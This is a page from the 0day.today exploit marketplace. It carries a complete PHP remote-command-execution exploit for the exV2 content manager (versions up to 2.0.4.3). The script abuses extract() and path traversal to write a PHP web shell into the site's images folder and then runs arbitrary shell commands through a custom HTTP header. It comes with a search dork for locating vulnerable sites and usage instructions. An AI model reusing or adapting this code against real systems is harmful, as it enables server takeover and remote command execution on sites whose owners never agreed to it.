0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
exV2 <= 2.0.4.3 extract() Remote Command Execution Exploit
========================================================== exV2 <= 2.0.4.3 extract() Remote Command Execution Exploit ========================================================== #!/usr/bin/php -q -d short_open_tag=on <? print_r(' ------------------------------------------------------------------------------- exV2 <= 2.0.4.3 extract() remote commands execution exploit dork: "Powered by eXV2 Vers" ------------------------------------------------------------------------------- '); /* this works regardless of php.ini settings two different exploit methods for register_globals=on or off */ if ($argc<4) { print_r(' ----------------------------------------------------------------------------- Usage: php '.$argv[0].' host path cmd OPTIONS host: target server (ip/hostname) path: path to exv2 cmd: a shell command Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' 2.2.2.2 /exv2/ ls -la -P1.1.1.1:80 php '.$argv[0].' 1.1.1.1 / ls -la -p81 ----------------------------------------------------------------------------- '); die; } /* software site: http://www.exv2.de/modules/welcome/ i) vulnerable code in include/common.php : ... // ################# :: Register Globals Compatibility :: ################# $globals_test = @ini_get('register_globals'); if ( isset($globals_test) && empty($globals_test) ) {echo "merdaaaaaaaaaaaaaaaaaaaa\n"; // These still need some work :: Cookie|Server|Env are ok now. if ( !empty($_GET) ) { extract($_GET, EXTR_SKIP); } if ( !empty($_POST) ) { extract($_POST, EXTR_OVERWRITE); } define('_GLOBALS', FALSE); } else { define('_GLOBALS', TRUE); } ... if register_globals = off you can overwrite every var on target server found this exploitation method: some lines after this code we have: ... // ################ Include page-specific lang file ################ // von Zeile 135 herunter gesetzt, da Userinfo usw. nicht in die language ?bernommen wurde if ( isset($xoopsOption['pagetype']) ) { if ( @file_exists(XOOPS_ROOT_PATH.'/language/'.$xoopsConfig['language'].'/'.$xoopsOption['pagetype'].'.php') ) { include_once(XOOPS_ROOT_PATH.'/language/'.$xoopsConfig['language'].'/'.$xoopsOption['pagetype'].'.php'); } else { include_once(XOOPS_ROOT_PATH.'/language/english/'.$xoopsOption['pagetype'].'.php'); } } ... so we modify the $xoopsOption['pagetype'] var to reach the mail_template.php script in /include folder where we have: ... $code=stripslashes(isset($code) ? $code : ""); if(isset($op_action) && $op_action == "save" && $lang != "" && $script != ""){ $code=str_replace("<","<",$code); $fp=fopen($mod_path."/language/".$lang."/mail_template/".$script, "w"); fputs ($fp,$code); fclose($fp); header("Location:index.php?".$temp_op."=mail_template&script=".$script."&lang=".$lang.""); exit(); } ... now we can save our shell code in a php file... also, if register_globals = On you can call directly the mail_template.php script to do the same stuff through the extract() bug is also possibile to delete recursively all sites content including the /modules/system/admin/design/include/conf_theme.php script and to upload images without authorization in /images/library folder including the image manager script and setting some vars ii) an sql injection issue, poc: http://retrogod.altervista.org/exv2_2043_sql.html iii) registered user can delete an arbitrary file on target server through avatar upload features, because of a directory traversal in old_avatar argument, passed to an unlink() this is the poc for i) */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $port=80; $proxy=""; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} //register_globals=off, extract() tricks... $data='-----------------------------7d626f251b00fa Content-Disposition: form-data; name="xoopsOption[pagetype]" ../../include/mail_template -----------------------------7d626f251b00fa Content-Disposition: form-data; name="op_action" save -----------------------------7d626f251b00fa Content-Disposition: form-data; name="mod_path" . -----------------------------7d626f251b00fa Content-Disposition: form-data; name="lang" english -----------------------------7d626f251b00fa Content-Disposition: form-data; name="script" ../../../images/library/placeholder.php -----------------------------7d626f251b00fa Content-Disposition: form-data; name="code" <?php set_time_limit(0); error_reporting(0); echo "my_delim"; passthru($_SERVER[HTTP_SUNTZU]);?> -----------------------------7d626f251b00fa-- '; $packet ="POST ".$p." HTTP/1.0\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d626f251b00fa\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(2); //register_globals=on $data='-----------------------------7d626f251b00fa Content-Disposition: form-data; name="op_action" save -----------------------------7d626f251b00fa Content-Disposition: form-data; name="mod_path" . -----------------------------7d626f251b00fa Content-Disposition: form-data; name="lang" english -----------------------------7d626f251b00fa Content-Disposition: form-data; name="script" ../images/library/placeholder.php -----------------------------7d626f251b00fa Content-Disposition: form-data; name="code" <?php set_time_limit(0); error_reporting(0); echo "my_delim"; passthru($_SERVER[HTTP_SUNTZU]);?> -----------------------------7d626f251b00fa-- '; $packet ="POST ".$p."include/mail_template.php HTTP/1.0\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d626f251b00fa\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(2); $packet ="GET ".$p."images/library/placeholder.php HTTP/1.0\r\n"; $packet.="SUNTZU: $cmd\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (strstr($html,"my_delim")) { $temp=explode("my_delim",$html); die($temp[1]); } echo "exploit failed..."; ?> # 0day.today [2024-09-29] #